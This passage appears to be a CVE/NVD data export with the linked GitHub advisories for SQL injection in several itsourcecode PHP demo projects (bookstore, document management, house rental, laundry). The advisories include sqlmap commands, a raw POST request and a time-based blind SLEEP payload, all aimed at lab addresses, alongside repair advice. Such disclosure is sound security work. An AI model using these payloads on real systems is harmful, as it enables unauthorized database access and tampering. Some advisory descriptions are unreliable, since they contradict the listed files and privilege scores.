"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/gabriel202212/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268721" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268721" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357075" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/gabriel202212/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268721" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268721" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357075" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_book_store_project_in_php_and_mysql_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F4DCA80-C02C-4BE9-83EE-294CD8ECFDD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/gabriel202212/cve/issues/1
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "gabriel202212", "cve" ]
# Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 admin_delete.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online-Bookstore-Project-In-PHP-Source-Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + momo2024 ## Vulnerable File + admin_delete.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'admin_delete.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "bookisbn" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="799" alt="1" src="https://github.com/gabriel202212/cve/assets/120346509/371f5579-ea08-4952-a5c1-ef80adbcb3fd"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "bookisbn" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online-Bookstore-Project-In-PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + time-based blind + error-based + boolean-based blind ## Vulnerability location: + 'bookisbn' parameter ## Payload: <img width="317" alt="2" src="https://github.com/gabriel202212/cve/assets/120346509/cc35e131-e3c4-4900-97be-c31e85ea8651"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u http://192.168.210.199:1213/admin_delete.php?bookisbn=978-1-49192-706-9 --batch --dbs ``` <img width="308" alt="3" src="https://github.com/gabriel202212/cve/assets/120346509/ef65cc0e-d814-4b37-9351-381061843aca"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 admin_delete.php SQL injection
https://api.github.com/repos/gabriel202212/cve/issues/1/comments
0
2024-06-14T05:14:26Z
2024-06-14T05:14:26Z
https://github.com/gabriel202212/cve/issues/1
2,352,524,829
1
6,073
CVE-2024-6014
2024-06-15T17:15:49.100
A vulnerability classified as critical has been found in itsourcecode Document Management System 1.0. Affected is an unknown function of the file edithis.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268722 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/gabriel202212/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268722" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268722" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357246" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/gabriel202212/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268722" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268722" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357246" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:document_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B896ED3E-BEFB-4226-9F2E-D703C9765BB1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/gabriel202212/cve/issues/2
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "gabriel202212", "cve" ]
# Itsourcecode Document Management System Open Source PHP v1.0 edithis.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Document Management System Open Source PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/document-management-system-open-source-php/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + momo2024 ## Vulnerable File + edithis.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Document-Management-System-Open-Source-PHP.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'edithis.php' file of the 'Document Management System Open Source PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ![image](https://github.com/gabriel202212/cve/assets/120346509/816271e9-1d7a-467f-a7a8-e229d7e944a4) ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "id" parameter, a serious SQL injection vulnerability has been discovered in the login function of the "Open Source PHP Document Management System", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /edithis.php HTTP/1.1 Host: 192.168.1.136:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 146 Origin: http://192.168.1.136:1218 Connection: close Referer: http://192.168.1.136:1218/edit.php?id=53 Cookie: PHPSESSID=1i594prvla2q2dsj5lap862c21; pma_lang=zh_CN; phpMyAdmin=ko8qa99uju5lctb08ogcrf5aoq; pmaUser-1=%7B%22iv%22%3A%22NXm9yy854VNynCoqsh%5C%2FUwQ%3D%3D%22%2C%22mac%22%3A%2229fb2536c65b3242e4c4476cd8989d36995e3ed1%22%2C%22payload%22%3A%229LygwlrFaQRGZN6PlPkgOQ%3D%3D%22%7D; ci_session=guuo6qsad7alqoormqsr89o2d4pr111e; pmaAuth-1=%7B%22iv%22%3A%22s5BVhIF3MHposdoUOZXnhA%3D%3D%22%2C%22mac%22%3A%22c098ab0a8c7943bf5375e4ddeaecb3c8506a9457%22%2C%22payload%22%3A%22WBLv4ZtZ%5C%2FliduMTxZ3fFkZ3zPqIkeTmrJdXoCrqWCqM%3D%22%7D Upgrade-Insecure-Requests: 1 Priority: u=1 id=53&field1=101-2021&field2=external&field3=New+File1&field4=This+is+my+new+file&field5=1012021&field6=ITSOURCECODE&field7=Jude&field8=2021-03-22 ``` ## Vulnerability type: + time-based blind + boolean-based blind + error-based ## Vulnerability location: + 'id' parameter ## Payload: <img width="944" alt="2" src="https://github.com/gabriel202212/cve/assets/120346509/b42337e7-f1d4-4c6e-864e-c5af6217f120"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="558" alt="3" src="https://github.com/gabriel202212/cve/assets/120346509/0ec9d943-95b6-4b89-9cef-2fd7a1e11a3d"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Document Management System Open Source PHP v1.0 edithis.php SQL injection
https://api.github.com/repos/gabriel202212/cve/issues/2/comments
0
2024-06-14T08:21:39Z
2024-06-14T08:21:39Z
https://github.com/gabriel202212/cve/issues/2
2,352,823,423
2
6,074
CVE-2024-6015
2024-06-15T17:15:49.403
A vulnerability classified as critical was found in itsourcecode Online House Rental System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument month_of leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268723.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/chenwulin-bit/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268723" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268723" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/chenwulin-bit/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268723" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268723" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357462" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_house_rental_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83FB0E1D-9D4D-40F5-8326-94970698C31F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/chenwulin-bit/cve/issues/1
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "chenwulin-bit", "cve" ]
# Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online House Rental System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-house-rental-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + chenwulin ## Vulnerable File + manage_user.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-House-Rental-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Online House Rental System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "month_of" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="910" alt="1" src="https://github.com/chenwulin-bit/cve/assets/172822200/2bbaebf6-50aa-4e8b-b6eb-b0c9ac58f2e0"> <img width="911" alt="4" src="https://github.com/chenwulin-bit/cve/assets/172822200/6919a26f-9031-46fc-8150-77bfc5ed5b28"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "month_of" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online House Rental System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + time-based blind ## Vulnerability location: + 'month_of' parameter ## Payload: page=payment_report&month_of=2024-06' AND (SELECT 2382 FROM (SELECT(SLEEP(5)))pylo) AND 'mZtF'='mZtF <img width="910" alt="1" src="https://github.com/chenwulin-bit/cve/assets/172822200/644e8324-ddf7-4d18-a865-2d789da7f3f0"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.1.136:1216/index.php?page=payment_report&month_of=2024-06" --batch --dbs ``` <img width="468" alt="3" src="https://github.com/chenwulin-bit/cve/assets/172822200/60f8b0e4-acfc-449b-80c6-02986568ed7c"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection
https://api.github.com/repos/chenwulin-bit/cve/issues/1/comments
0
2024-06-14T14:38:14Z
2024-06-14T14:38:14Z
https://github.com/chenwulin-bit/cve/issues/1
2,353,523,129
1
6,075
CVE-2024-6016
2024-06-15T19:15:48.443
A vulnerability, which was classified as critical, has been found in itsourcecode Online Laundry Management System 1.0. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268724.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/chenwulin-bit/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268724" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268724" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357463" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/chenwulin-bit/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268724" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268724" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://vuldb.com/?submit.357463" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:laundry_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9098A3E9-9903-45B9-8F93-8F55DD9FD767", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/chenwulin-bit/cve/issues/2
[ "Exploit", "Technical Description", "Third Party Advisory" ]
github.com
[ "chenwulin-bit", "cve" ]
# Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Laundry Management System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/laundry-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + chenwulin ## Vulnerable File + admin_class.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Laundry-Management-System-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'admin_class.php' file of the 'Laundry Management System Project In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="814" alt="1" 